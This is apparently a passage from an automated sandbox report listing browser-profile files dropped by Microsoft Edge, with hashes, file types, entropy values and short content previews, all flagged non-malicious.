                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.263 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-03:05:22.264 9e4 Recovering log #3.2024/12/27-03:05:22.264 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6135038864111126
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jCClp0HmL:TO8D4jJ/6Up+mCA8
                                                                                                                                                                                                                                                                                      MD5:461255FC0022CA9D425A3DC8A2DF8B48
                                                                                                                                                                                                                                                                                      SHA1:FC5C0CA1F33CAB0C8D7FC4AEE2B0D8CB42901E15
                                                                                                                                                                                                                                                                                      SHA-256:49FD636E7CBC5A74C30C674E40C049AB27C5148C2CC0D1B0F9AA9136766FA5DC
                                                                                                                                                                                                                                                                                      SHA-512:C344ADDB7D325533EF6423D12E77D1331E40C2532D205FB5D0641AC9F6AB08CE744C304127B973B61FC0FBD8A796956470549E74F98A93F7AE47502A7917224A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):375520
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.354095496289301
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:wA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:wFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                      MD5:C80407C679A852610C5423F0B971C1EC
                                                                                                                                                                                                                                                                                      SHA1:96F0F8B6FAEB434D26932340F69A25AFE4D5BF90
                                                                                                                                                                                                                                                                                      SHA-256:510F8AB090A0C4F50281883CDC669919E061134B20C7BE5F0E28C2880E7532F5
                                                                                                                                                                                                                                                                                      SHA-512:1FC4AC4C5B57987AC919FD13AE3A62972F0211C84441001C2108E74FB0587BC4670406785FFE990A45839D34CD3C19765F71BC3D50F9214F5E202AB8EBFFCBE3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.10.2.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379760330052369..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):317
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.15032370545021
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyAo1cNwi23oH+Tcwtk2WwnvB2KLl1yALEIq2PcNwi23oH+Tcwtk2WwnvIFUv:gZYebkxwnvFL5EIvLZYebkxwnQFUv
                                                                                                                                                                                                                                                                                      MD5:B6E6B6892836D4D55F34BB84893B1815
                                                                                                                                                                                                                                                                                      SHA1:F54B14B05D7E86C77FFBD831A7B77C0E5500D693
                                                                                                                                                                                                                                                                                      SHA-256:349B00BF2F2677D3D6D05CFB87419AEFEB7CE076ECB62A08A1BCB6250575F710
                                                                                                                                                                                                                                                                                      SHA-512:60C64E762C0426C938ED4916049ECBF855EEA90955765B33D5EA2E69F2A0B0A18BF8D882A428827D722D3F2DF72F30FB205C4F205AB586D73D2388F5170DF820
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:27.224 11c0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-03:05:27.260 11c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):358860
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.324614072986668
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rz:C1gAg1zfvr
                                                                                                                                                                                                                                                                                      MD5:BC55A43764AB5B1CB8FD09FDC1DB1773
                                                                                                                                                                                                                                                                                      SHA1:44FFD30C5F7616A79E4FB9983F004F0D33F3C358
                                                                                                                                                                                                                                                                                      SHA-256:F997DB0260DDC304DDE6C529992594EB419976C294A29CB68E34F50CB0F5490A
                                                                                                                                                                                                                                                                                      SHA-512:01242B73446CFF6960A767C6ED03AF3E851913D86CD08E308003FF6A90266AFA3C9C9F7145003C46B0C8FD1378EFE94792AB995713E467B6C736ACE3CF4E4077
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):327
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.154280272285558
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyftL1yq2PcNwi23oH+Tcwt8aPrqIFUt8WyfeTz1Zmw+WyfeTlRkwOcNwi23oH+o:5vLZYebL3FUt8A1/+C54ZYebQJ
                                                                                                                                                                                                                                                                                      MD5:51E6A4CBA8A7CA6741A13E4E9B61F46A
                                                                                                                                                                                                                                                                                      SHA1:360E8270C9876D95B48757592740C1CCD5C0431E
                                                                                                                                                                                                                                                                                      SHA-256:18F5EC3FA79640EA27AA98471C339AAFEB6044D0A6389A145595F3A379036A43
                                                                                                                                                                                                                                                                                      SHA-512:AEE1F7711C78BBD451A30F12BCE632913E7F857406DF6F5C62F75F33A925F3BEDD8E06BF353CBA51C5226A358513D9BA48E259D3DDB1E5CABABD0F1E5C706E5E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.273 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-03:05:22.274 9e4 Recovering log #3.2024/12/27-03:05:22.274 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):327
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.154280272285558
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyftL1yq2PcNwi23oH+Tcwt8aPrqIFUt8WyfeTz1Zmw+WyfeTlRkwOcNwi23oH+o:5vLZYebL3FUt8A1/+C54ZYebQJ
                                                                                                                                                                                                                                                                                      MD5:51E6A4CBA8A7CA6741A13E4E9B61F46A
                                                                                                                                                                                                                                                                                      SHA1:360E8270C9876D95B48757592740C1CCD5C0431E
                                                                                                                                                                                                                                                                                      SHA-256:18F5EC3FA79640EA27AA98471C339AAFEB6044D0A6389A145595F3A379036A43
                                                                                                                                                                                                                                                                                      SHA-512:AEE1F7711C78BBD451A30F12BCE632913E7F857406DF6F5C62F75F33A925F3BEDD8E06BF353CBA51C5226A358513D9BA48E259D3DDB1E5CABABD0F1E5C706E5E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.273 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-03:05:22.274 9e4 Recovering log #3.2024/12/27-03:05:22.274 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.173126904590315
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfY71yq2PcNwi23oH+Tcwt865IFUt8Wyf7F1Zmw+Wyf2vTRkwOcNwi23oH+Tcwx:H74vLZYeb/WFUt8X1/+YN54ZYeb/+SJ
                                                                                                                                                                                                                                                                                      MD5:DC8C2D9F09A78BF9E24DB5410A2BFF2F
                                                                                                                                                                                                                                                                                      SHA1:51676613C896C7E7180A9877824C33917C2B8F5D
                                                                                                                                                                                                                                                                                      SHA-256:638ECF4B0BB72264F18E3467FAB9DCF0082A62F734B7CB32DD311D7969BF1A58
                                                                                                                                                                                                                                                                                      SHA-512:544D865B2A81809850F2B45B7C3B1E967CDA39DBCF848BD012F6F3E120EB53EC7145161BB569ED23AF2BDC187C1118643E1261FB554223B0F101D195891E414E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.298 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-03:05:22.299 9e4 Recovering log #3.2024/12/27-03:05:22.300 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.173126904590315
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfY71yq2PcNwi23oH+Tcwt865IFUt8Wyf7F1Zmw+Wyf2vTRkwOcNwi23oH+Tcwx:H74vLZYeb/WFUt8X1/+YN54ZYeb/+SJ
                                                                                                                                                                                                                                                                                      MD5:DC8C2D9F09A78BF9E24DB5410A2BFF2F
                                                                                                                                                                                                                                                                                      SHA1:51676613C896C7E7180A9877824C33917C2B8F5D
                                                                                                                                                                                                                                                                                      SHA-256:638ECF4B0BB72264F18E3467FAB9DCF0082A62F734B7CB32DD311D7969BF1A58
                                                                                                                                                                                                                                                                                      SHA-512:544D865B2A81809850F2B45B7C3B1E967CDA39DBCF848BD012F6F3E120EB53EC7145161BB569ED23AF2BDC187C1118643E1261FB554223B0F101D195891E414E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.298 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-03:05:22.299 9e4 Recovering log #3.2024/12/27-03:05:22.300 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                      MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                      SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                      SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                      SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.174686493157121
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfOVUW9yq2PcNwi23oH+Tcwt8NIFUt8WyfOSus1Zmw+WyfOHUW9RkwOcNwi23oN:bbAvLZYebpFUt8ASus1/+AHp754ZYeb2
                                                                                                                                                                                                                                                                                      MD5:8C054CA83B5A9A76E1F07226408FBBD9
                                                                                                                                                                                                                                                                                      SHA1:390ECACFC2B74AAE8F526D9B16038D9C56BB5EF2
                                                                                                                                                                                                                                                                                      SHA-256:67A1C434656CC20F724F8040E42C3D1A9FC08AFDEB2D5500AF450F14151DD7DA
                                                                                                                                                                                                                                                                                      SHA-512:0C1CE1E442A113A5CABD09326F58746608B2AA7267229139064F8432EF50F49D6714B359C2A42927BC673DE949901E499919E2C241E6736E4D853E41037A5D47
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.962 12c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-03:05:22.967 12c0 Recovering log #3.2024/12/27-03:05:22.968 12c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.174686493157121
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfOVUW9yq2PcNwi23oH+Tcwt8NIFUt8WyfOSus1Zmw+WyfOHUW9RkwOcNwi23oN:bbAvLZYebpFUt8ASus1/+AHp754ZYeb2
                                                                                                                                                                                                                                                                                      MD5:8C054CA83B5A9A76E1F07226408FBBD9
                                                                                                                                                                                                                                                                                      SHA1:390ECACFC2B74AAE8F526D9B16038D9C56BB5EF2
                                                                                                                                                                                                                                                                                      SHA-256:67A1C434656CC20F724F8040E42C3D1A9FC08AFDEB2D5500AF450F14151DD7DA
                                                                                                                                                                                                                                                                                      SHA-512:0C1CE1E442A113A5CABD09326F58746608B2AA7267229139064F8432EF50F49D6714B359C2A42927BC673DE949901E499919E2C241E6736E4D853E41037A5D47
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.962 12c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-03:05:22.967 12c0 Recovering log #3.2024/12/27-03:05:22.968 12c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                      Encrypted:false
